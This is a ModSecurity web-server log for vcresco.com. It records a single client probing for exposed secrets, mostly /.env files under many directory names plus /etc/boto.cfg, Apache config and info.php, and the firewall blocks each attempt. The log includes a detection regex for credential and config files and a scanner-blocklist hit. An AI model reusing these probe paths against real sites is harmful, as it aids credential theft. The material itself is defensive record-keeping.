[Tue May 26 13:04:02.886481 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AegAAAAw"]
[Tue May 26 13:04:02.886872 2026] [security2:error] [pid 470766:tid 470923] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AewAAABs"]
[Tue May 26 13:04:02.887197 2026] [security2:error] [pid 470766:tid 470842] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/erp/.env"] [unique_id "ahVM6ujO_W1DqEcFHQ4AfAAAOks"]
[Tue May 26 13:04:02.899503 2026] [security2:error] [pid 470766:tid 470863] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVM6ujO_W1DqEcFHQ4AfwAADmA"]
[Tue May 26 13:04:02.925392 2026] [security2:error] [pid 470766:tid 470877] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/etc/boto.cfg"] [unique_id "ahVM6ujO_W1DqEcFHQ4AhAAADm4"]
[Tue May 26 13:04:02.926010 2026] [security2:error] [pid 470766:tid 470864] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/fe/.env"] [unique_id "ahVM6ujO_W1DqEcFHQ4AhQAADmE"]
[Tue May 26 13:04:02.937306 2026] [security2:error] [pid 470766:tid 470980] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AgwAAAFQ"]
[Tue May 26 13:04:02.965168 2026] [security2:error] [pid 470766:tid 471005] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AiAAAAG0"]
[Tue May 26 13:04:03.001241 2026] [security2:error] [pid 470766:tid 470865] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/front/.env"] [unique_id "ahVM6ujO_W1DqEcFHQ4AlwAAJGI"]
[Tue May 26 13:04:03.003985 2026] [security2:error] [pid 470766:tid 470872] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/frontend/.env"] [unique_id "ahVM6-jO_W1DqEcFHQ4AmQAAJGk"]
[Tue May 26 13:04:03.015462 2026] [security2:error] [pid 470766:tid 470967] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AjgAAAEc"]
[Tue May 26 13:04:03.016894 2026] [security2:error] [pid 470766:tid 470988] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AkAAAAFw"]
[Tue May 26 13:04:03.028163 2026] [security2:error] [pid 470766:tid 470920] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ujO_W1DqEcFHQ4AlgAAABg"]
[Tue May 26 13:04:03.063523 2026] [security2:error] [pid 470766:tid 470987] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4AoAAAAFs"]
[Tue May 26 13:04:03.070316 2026] [security2:error] [pid 470766:tid 470780] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/info.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4ArQAAJA0"]
[Tue May 26 13:04:03.071074 2026] [security2:error] [pid 470766:tid 470786] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/infophp.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4ArgAAJBM"]
[Tue May 26 13:04:03.082633 2026] [security2:error] [pid 470766:tid 470794] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/infos.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4ArwAAJBs"]
[Tue May 26 13:04:03.149619 2026] [security2:error] [pid 470766:tid 470817] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/laravel/.env"] [unique_id "ahVM6-jO_W1DqEcFHQ4AtAAAJDI"]
[Tue May 26 13:04:03.188857 2026] [security2:error] [pid 470766:tid 470785] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/lms/.env"] [unique_id "ahVM6-jO_W1DqEcFHQ4AugAAJBI"]
[Tue May 26 13:04:03.191832 2026] [security2:error] [pid 470766:tid 470776] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/local/.env"] [unique_id "ahVM6-jO_W1DqEcFHQ4AvAAAJAk"]
[Tue May 26 13:04:03.279438 2026] [security2:error] [pid 470766:tid 470979] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4AqwAAAFM"]
[Tue May 26 13:04:03.284772 2026] [security2:error] [pid 470766:tid 470904] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4ArAAAAAg"]
[Tue May 26 13:04:03.284776 2026] [security2:error] [pid 470766:tid 470932] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4ApwAAJG0"]
[Tue May 26 13:04:03.285566 2026] [security2:error] [pid 470766:tid 470905] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4AqQAAAAk"]
[Tue May 26 13:04:03.286890 2026] [security2:error] [pid 470766:tid 471017] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4AqgAAAHk"]
[Tue May 26 13:04:03.292963 2026] [security2:error] [pid 470766:tid 470929] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4AqAAAACE"]
[Tue May 26 13:04:03.303229 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4AsgAAAGA"]
[Tue May 26 13:04:03.303394 2026] [security2:error] [pid 470766:tid 470971] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4AvgAAAEs"]
[Tue May 26 13:04:03.307828 2026] [security2:error] [pid 470766:tid 471007] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4AtgAAAG8"]
[Tue May 26 13:04:03.665369 2026] [security2:error] [pid 470766:tid 470787] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/market/.env"] [unique_id "ahVM6-jO_W1DqEcFHQ4A0QAAXhQ"]
[Tue May 26 13:04:03.665888 2026] [security2:error] [pid 470766:tid 470831] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/marketing/.env"] [unique_id "ahVM6-jO_W1DqEcFHQ4A0gAAXkA"]
[Tue May 26 13:04:03.667308 2026] [security2:error] [pid 470766:tid 470793] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/new/.env"] [unique_id "ahVM6-jO_W1DqEcFHQ4A1wAAXho"]
[Tue May 26 13:04:03.667498 2026] [security2:error] [pid 470766:tid 470849] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/media/.env"] [unique_id "ahVM6-jO_W1DqEcFHQ4A1AAAXlI"]
[Tue May 26 13:04:03.668229 2026] [security2:error] [pid 470766:tid 470808] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/node/.env"] [unique_id "ahVM6-jO_W1DqEcFHQ4A2wAAXik"]
[Tue May 26 13:04:03.668285 2026] [security2:error] [pid 470766:tid 470793] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/node/backend/.env"] [unique_id "ahVM6-jO_W1DqEcFHQ4A3AAAXho"]
[Tue May 26 13:04:03.668467 2026] [security2:error] [pid 470766:tid 470829] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/node-api/.env"] [unique_id "ahVM6-jO_W1DqEcFHQ4A2QAAXj4"]
[Tue May 26 13:04:03.668785 2026] [security2:error] [pid 470766:tid 470804] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/node/api/.env"] [unique_id "ahVM6-jO_W1DqEcFHQ4A2gAAXiU"]
[Tue May 26 13:04:03.669750 2026] [security2:error] [pid 470766:tid 470849] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/nodeapi/.env"] [unique_id "ahVM6-jO_W1DqEcFHQ4A3QAAXlI"]
[Tue May 26 13:04:03.707039 2026] [security2:error] [pid 470766:tid 470944] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4A5QAAADA"]
[Tue May 26 13:04:03.710824 2026] [security2:error] [pid 470766:tid 470910] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4A6AAAAA4"]
[Tue May 26 13:04:03.711875 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4A5wAAAAE"]
[Tue May 26 13:04:03.712802 2026] [security2:error] [pid 470766:tid 470902] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4A5gAAAAY"]
[Tue May 26 13:04:03.715680 2026] [security2:error] [pid 470766:tid 470999] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4A6gAAAGc"]
[Tue May 26 13:04:03.715738 2026] [security2:error] [pid 470766:tid 471001] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4A6QAAAGk"]
[Tue May 26 13:04:03.717257 2026] [security2:error] [pid 470766:tid 471016] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4A6wAAAHg"]
[Tue May 26 13:04:03.813274 2026] [security2:error] [pid 470766:tid 470814] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/nodeweb/.env"] [unique_id "ahVM6-jO_W1DqEcFHQ4A7wAAMS8"]
[Tue May 26 13:04:03.817711 2026] [security2:error] [pid 470766:tid 470809] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/opt/.env"] [unique_id "ahVM6-jO_W1DqEcFHQ4A9AAAMSo"]
[Tue May 26 13:04:03.819595 2026] [security2:error] [pid 470766:tid 470789] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/old/.env"] [unique_id "ahVM6-jO_W1DqEcFHQ4A-QAAMRY"]
[Tue May 26 13:04:03.856822 2026] [security2:error] [pid 470766:tid 470957] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4A_wAAAD0"]
[Tue May 26 13:04:03.858060 2026] [security2:error] [pid 470766:tid 470976] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4BAAAAAFA"]
[Tue May 26 13:04:03.858277 2026] [security2:error] [pid 470766:tid 470943] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4A-wAAAC8"]
[Tue May 26 13:04:03.861871 2026] [security2:error] [pid 470766:tid 470998] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4A_QAAAGY"]
[Tue May 26 13:04:03.862472 2026] [security2:error] [pid 470766:tid 470979] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6-jO_W1DqEcFHQ4BAwAAAFM"]
